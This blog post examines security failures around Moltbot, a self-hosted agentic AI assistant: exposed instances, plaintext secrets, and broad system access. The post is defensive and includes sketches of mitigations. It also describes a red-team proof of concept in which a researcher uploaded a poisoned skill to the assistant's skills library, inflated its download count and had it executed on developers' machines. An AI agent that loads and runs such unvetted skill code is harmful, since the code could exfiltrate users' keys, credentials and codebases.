
A Cautionary Tale from a Viral AI Assistant: Artificial Intelligence Trends

Here’s a viral, powerful, open-source personal AI assistant that’s serving as a cautionary tale – on several levels – about what can go wrong.

The AI assistant is Moltbot, a popular agentic AI personal assistant formerly known as “Clawdbot”. Why did they change the name? You can probably guess: “Anthropic asked us to change our name,” the newly named Moltbot account wrote on X on Tuesday. “‘Molt’ fits perfectly – it’s what lobsters do to grow.”

When you start out by being forced to change your name, that’s not a good start. But that’s just the beginning.


Moltbot is an open-source, self-hosted AI personal assistant, which does things like:

  • Integrate popular messaging apps such as Telegram, WhatsApp, Discord, and Slack;
  • Perform complex tasks (via agentic AI) with minimal user intervention, such as managing calendars, responding to emails, screening phone calls, and booking table reservations;
  • Retain long-term memory, allowing it to provide more personalized assistance over time;
  • Utilize a skills library called ClawdHub (which apparently hasn’t been renamed – yet), where users can download additional functionality to expand the bot’s capabilities.

It is designed as a privacy-focused alternative to cloud-based AI tools, running locally on a user’s machine rather than on a remote server. To achieve this level of automation, Moltbot requires deep system access: credentials for, and access to, encrypted messaging apps and personal files so it can function as a comprehensive personal assistant.
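
To make that level of access concrete, here’s a minimal sketch of the kind of configuration a self-hosted, do-everything assistant ends up holding. The structure and key names below are hypothetical illustrations, not Moltbot’s actual format:

```python
# Hypothetical sketch (not Moltbot's real config format): the breadth of
# standing credentials a "do everything" assistant needs is the point.
assistant_config = {
    "messaging": {
        "telegram_bot_token": "...",    # full read/write to your chats
        "slack_token": "...",
        "whatsapp_session": "~/.assistant/wa-session",
    },
    "email": {"imap_password": "..."},           # read and send as you
    "calendar": {"oauth_refresh_token": "..."},  # manage your schedule
    "filesystem_root": "/home/you",              # long-term memory lives here
}
# Whoever controls the assistant's process (or can read this config)
# effectively becomes you across every connected service.
```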

See where this is heading? Here are some of the components making up this cautionary tale for Moltbot:

The “Easy Install” Is a Security Trapdoor


While Clawdbot was designed for accessibility, its ease of use masked a deep technical complexity. Security researchers, including Jamieson O’Reilly (founder of red-teaming company Dvuln) and the firm SlowMist, quickly found hundreds of Clawdbot instances exposed to the public internet. This exposure stemmed from user configuration errors rather than a hidden exploit in the software itself, highlighting a dangerous gap between the tool’s appeal and the expertise needed to run it safely.

As Eric Schwake, director of cybersecurity strategy at Salt Security, explained in this article, “A significant gap exists between the consumer enthusiasm for Clawdbot’s one-click appeal and the technical expertise needed to operate a secure agentic gateway.” This misconfiguration could leak API keys, private chat logs, and account credentials. Compounding the risk, security firm Hudson Rock found that the tool stores some user secrets in plaintext Markdown and JSON files, making them an easy target for common infostealer malware like Redline, Lumma, and Vidar if the host machine is compromised.
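
The class of misconfiguration the researchers describe is easy to picture. Here’s a minimal sketch using only Python’s standard library (illustrative, not Moltbot’s actual code): the difference between a gateway that answers only on the local machine and one that internet-wide scanners can find is a single bind address.

```python
from http.server import HTTPServer, BaseHTTPRequestHandler

class GatewayHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Stand-in for an agent endpoint that can read files and run
        # commands on the owner's behalf.
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"agent gateway up\n")

# Reachable only from the local machine; internet scanners never see it.
server = HTTPServer(("127.0.0.1", 8080), GatewayHandler)

# The misconfiguration: binding to all interfaces ("0.0.0.0") on a host
# with a public IP makes the same endpoint discoverable by mass scanners.
# server = HTTPServer(("0.0.0.0", 8080), GatewayHandler)

server.serve_forever()
```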

Its Greatest Strength Is Its Biggest Flaw

The central paradox of an agentic AI like Clawdbot is that its value comes from its greatest risk: deep system access. For the tool to be useful, it must read files, execute commands, and access credentials. This design fundamentally undermines decades of established cybersecurity principles. Wendi Whitmore, chief security intelligence officer at Palo Alto Networks, warned that such tools could represent “the new era of insider threats,” turning a trusted assistant into a prime target for hijacking.

O’Reilly articulated this fundamental conflict perfectly:

“The deeper issue is that we’ve spent 20 years building security boundaries into modern operating systems. Sandboxing, process isolation, permission models, firewalls, separating the user’s internal environment from the internet. All of that work was designed to limit blast radius and prevent remote access to local resources. AI agents tear all of that down by design. They need to read your files, access your credentials, execute commands, and interact with external services. The value proposition requires punching holes through every boundary we spent decades building.”
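
Reclaiming even some of that blast radius means re-imposing the boundaries the agent design removed. One sketch of what that could look like (my own illustration, not a Moltbot feature): instead of handing the agent a raw shell, route every command through a broker that only executes a short allowlist.

```python
import shlex
import subprocess

# Hypothetical mitigation sketch: the agent never gets a shell, only this
# broker, so a hijacked agent is limited to a handful of read-only commands.
ALLOWED_COMMANDS = {"ls", "cat", "date"}

def run_for_agent(command_line: str) -> str:
    argv = shlex.split(command_line)
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        raise PermissionError(f"command not allowed: {command_line!r}")
    # shell=False (the default with a list) means pipes, redirects, and
    # other shell metacharacters are never interpreted.
    result = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return result.stdout

print(run_for_agent("date"))            # permitted
# run_for_agent("curl evil.sh | sh")    # raises PermissionError
```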

Even Its “Skills” Can Be Poisoned

O’Reilly also demonstrated a significant supply chain vulnerability in ClawdHub, the AI assistant’s skills library. In a proof of concept, he uploaded a skill with a deliberately harmless payload, artificially inflated its download count to over 4,000, and confirmed that developers had downloaded the poisoned package. “The payload pinged my server to prove execution occurred, but I deliberately excluded hostnames, file contents, credentials, and everything else I could have taken,” he said.

This is exceptionally dangerous because ClawdHub’s own developer notes clarify that all code is treated as “trusted code,” with no moderation process currently in place. The entire burden of vetting code falls on the user. The potential for damage is immense. As O’Reilly noted, in the hands of a real attacker, “those developers would have had their SSH keys, AWS credentials, and entire codebases exfiltrated before they knew anything was wrong.”
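
Until a registry like ClawdHub adds moderation, that vetting burden really does sit with the user. A minimal sketch of one defensive habit (hypothetical code, not a ClawdHub feature): pin the exact hash of a skill version you’ve audited and refuse to load anything that differs, no matter how impressive its download count looks.

```python
import hashlib
from pathlib import Path

# Hypothetical sketch: record the SHA-256 of the skill version you actually
# reviewed, and refuse to load anything whose bytes differ.
PINNED_SHA256 = "digest-of-the-skill-you-audited"  # placeholder value

def load_skill(path: str) -> str:
    data = Path(path).read_bytes()
    digest = hashlib.sha256(data).hexdigest()
    if digest != PINNED_SHA256:
        raise ValueError(f"skill hash mismatch: {digest} (refusing to load)")
    return data.decode("utf-8")  # only now does the code reach the agent
```

Inflated download counts defeat popularity as a trust signal, which is exactly what O’Reilly’s proof of concept showed; a pinned hash can’t be gamed the same way.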

Where There’s Hype, There Are Scammers

If that wasn’t bad enough, scammers were quick to exploit the popularity surrounding Clawdbot’s forced rebranding to Moltbot. During the name change, they hijacked old accounts and squatted on the project’s related GitHub and X handles, using the confusion to impersonate the project and promote a fake $CLAWD token on Solana. The scheme briefly worked, with the token reaching an early market capitalization of around $16 million.

The momentum was short-lived. The token’s market cap plunged from roughly $8 million to under $800,000 as soon as the project’s founder, Peter Steinberger, publicly denied any involvement. Steinberger, who is now working with GitHub to recover the affected accounts, has made it clear that he has no connection to any cryptocurrency:

“To all crypto folks: Please stop pinging me, stop harassing me. I will never do a coin. Any project that lists me as coin owner is a SCAM. No, I will not accept fees. You are actively damanging [sic] the project.”

A rocky start for Clawd, er, Moltbot provides a cautionary tale for the rest of us. Does Moltbot have a future as a useful AI assistant? We’ll see, but it certainly has a rough start to overcome first.

Hat tip to my son Carter, who gave me the heads up on this story and shared the linked articles to boot!

So, what do you think? Do you have any other AI cautionary tale stories to add? Please share any comments you might have or if you’d like to know more about a particular topic.

Image created using Microsoft Designer, using the term “robot lawyer holding a robot lobster”. Written with AI assistance.

Disclaimer: The views represented herein are exclusively the views of the authors and speakers themselves, and do not necessarily represent the views held by my employer, my partners or my clients. eDiscovery Today is made available solely for educational purposes to provide general information about general eDiscovery principles and not to provide specific legal advice applicable to any particular circumstance. eDiscovery Today should not be used as a substitute for competent legal advice from a lawyer you have retained and who has agreed to represent you.

